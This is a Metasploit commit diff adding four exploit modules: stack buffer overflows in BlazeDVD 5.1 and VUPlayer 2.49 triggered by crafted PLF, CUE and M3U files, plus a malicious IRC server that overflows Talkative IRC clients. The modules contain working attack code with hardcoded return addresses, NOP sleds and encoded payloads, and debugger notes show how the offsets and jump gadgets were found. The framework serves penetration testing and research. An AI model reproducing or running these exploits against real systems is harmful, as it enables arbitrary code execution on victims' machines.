added exploit modules talkative_response.rb, blazedvd_plf.rb, vuplayer_cue.rb and vuplayer_m3u.rb

git-svn-id: file:///home/svn/framework3/trunk@7170 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/fileformat/blazedvd_plf.rb

@@ -0,0 +1,88 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::FILEFORMAT
+        
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'BlazeDVD 5.1 PLF Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack over flow in BlazeDVD 5.1. When
+					the application is used to open a specially crafted plf file, 
+					a buffer is overwritten allowing for the execution of arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'MC' ],
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					[ 'CVE' , '2006-6199' ],
+					[ 'BID', '35918' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},					
+			'Payload'        =>
+				{
+					'Space'    => 750,
+					'BadChars' => "\x00",
+					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
+					'DisableNops'  =>  'True',
+				},
+			'Platform' => 'win',
+			'Targets'        => 
+				[
+					[ 'BlazeDVD 5.1', { 'Ret' => 0x100101e7 } ], 
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Aug 03 2009',
+			'DefaultTarget'  => 0))
+
+                        register_options(
+                                [
+                                        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.plf']),
+                                ], self.class)
+
+	end
+
+	def exploit
+
+		plf = rand_text_alpha_upper(6024)
+
+		plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)  + [target.ret].pack('V')
+		plf[876,12] = make_nops(12)
+		plf[888,payload.encoded.length] = payload.encoded
+		
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+		file_create(plf)
+		
+	end
+
+end
+=begin
+0:000> !exchain
+0012f2c8: 31644230
+Invalid exception stack at 64423963
+0:000> !pattern_offset 6024 0x31644230
+[Byakugan] Control of 0x31644230 at offset 872.
+0:000> !pattern_offset 6024 0x64423963
+[Byakugan] Control of 0x64423963 at offset 868.
+0:000> s -b 0x10000000 0x10018000 5e 59 c3
+100012cd  5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00  ^Y.V.t$.W..V..<.
+100101e7  5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24  ^Y........D$..L$
+0:000> u 0x100012cd L3
+skinscrollbar!SkinSB_ParentWndProc+0x1fd:
+100012cd 5e              pop     esi
+100012ce 59              pop     ecx
+100012cf c3              ret
+=end

modules/exploits/windows/fileformat/vuplayer_cue.rb

@@ -0,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::FILEFORMAT
+        
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VUPlayer CUE Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack over flow in VUPlayer <= 2.49. When
+					the application is used to open a specially crafted cue file, an buffer is overwritten allowing
+					for the execution of arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'MC' ],
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					[ 'BID', '33960' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},					
+			'Payload'        =>
+				{
+					'Space'    => 750,
+					'BadChars' => "\x00",
+					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
+					'DisableNops'  =>  'True',
+				},
+			'Platform' => 'win',
+			'Targets'        => 
+				[
+					[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ], 
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Aug 18 2009',
+			'DefaultTarget'  => 0))
+
+                        register_options(
+                                [
+                                        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.cue']),
+                                ], self.class)
+
+	end
+
+	def exploit
+
+		sploit =  rand_text_alpha_upper(1012)
+		sploit << [target.ret].pack('V')
+		sploit << "\x90" * 12
+		sploit << payload.encoded
+
+		cue =  "FILE ""\""
+		cue << sploit
+		cue << ".BIN""\"" + " BINARY\r\n"
+		cue << "TRACK 01 MODE1/22352\r\n"
+		cue << "INDEX 01 00:00:00\r\n"
+ 	
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+		file_create(cue)
+		
+	end
+
+end

modules/exploits/windows/fileformat/vuplayer_m3u.rb

@@ -0,0 +1,90 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::FILEFORMAT
+        
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VUPlayer M3U Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack over flow in VUPlayer <= 2.49. When
+					the application is used to open a specially crafted m3u file, an buffer is overwritten allowing
+					for the execution of arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'MC' ],
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					[ 'CVE', '2006-6251' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},					
+			'Payload'        =>
+				{
+					'Space'    => 750,
+					'BadChars' => "\x00",
+					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
+					'DisableNops'  =>  'True',
+				},
+			'Platform' => 'win',
+			'Targets'        => 
+				[
+					[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ], 
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Aug 18 2009',
+			'DefaultTarget'  => 0))
+
+                        register_options(
+                                [
+                                        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.m3u']),
+                                ], self.class)
+
+	end
+
+	def exploit
+
+		m3u = rand_text_alpha_upper(2024)
+
+		m3u[1012,4]  = [target.ret].pack('V')
+		m3u[1016,12] = "\x90" * 12
+		m3u[1028,payload.encoded.length] = payload.encoded
+		
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+		file_create(m3u)
+		
+	end
+
+end
+=begin
+0:000> r eip
+eip=68423768
+0:000> !pattern_offset 2024
+[Byakugan] Control of ecx at offset 996.
+[Byakugan] Control of ebp at offset 1008.
+[Byakugan] Control of eip at offset 1012.
+0:000> d esp
+0012ef44  39684238 42306942 69423169 33694232  8Bh9Bi0Bi1Bi2Bi3
+0012ef54  42346942 69423569 37694236 42386942  Bi4Bi5Bi6Bi7Bi8B
+0012ef64  6a423969 316a4230 42326a42 6a42336a  i9Bj0Bj1Bj2Bj3Bj
+0012ef74  356a4234 42366a42 6a42376a 396a4238  4Bj5Bj6Bj7Bj8Bj9
+0012ef84  42306b42 6b42316b 336b4232 42346b42  Bk0Bk1Bk2Bk3Bk4B
+0012ef94  6b42356b 376b4236 42386b42 6c42396b  k5Bk6Bk7Bk8Bk9Bl
+0:000> s -b 0x10100000 0x1010a000 ff e4
+1010539f  ff e4 49 10 10 20 05 93-19 01 00 00 00 9c 53 10  ..I.. ........S.
+0:000> u 0x1010539f L1
+BASSWMA!BASSplugin+0xe9a:
+1010539f ffe4            jmp     esp
+=end

modules/exploits/windows/misc/talkative_response.rb

@@ -0,0 +1,74 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::TcpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Talkative IRC v0.4.4.16 Response Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in Talkative IRC v0.4.4.16.
+					When a specially crafted response string is sent to a client,
+					an attacker may be able to execute arbitrary code. 
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     => 
+				[ 
+					[ 'BID', '34141' ],
+					[ 'URL', 'http://milw0rm.com/exploits/8227' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 750,
+					'BadChars' => "\x00\x0a\x20\x0d",
+					'StackAdjustment'  => -3500,
+					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
+					'DisableNops' => 'True',
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP3 English',	{ 'Ret' => 0x72d1146b } ],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Mar 17 2009',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[ 
+				OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ])
+			], self.class)
+	end
+
+	def on_client_connect(client)
+		res = ":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\r\n"
+		client.put(res)
+	end
+
+	def on_client_data(client)
+		return if ((p = regenerate_payload(client)) == nil)
+
+		sploit = ":" + rand_text_alpha_upper(272) + Rex::Arch::X86.jmp_short(6)
+		sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded 
+		sploit << " PRIVMSG " + rand_text_alpha(rand(10) + 1)
+		sploit << " : /FINGER " + rand_text_alpha(rand(10) + 1) + ".\r\n"
+	
+		client.put(sploit)
+		
+		handler
+		service.close_client(client)
+	end
+
+end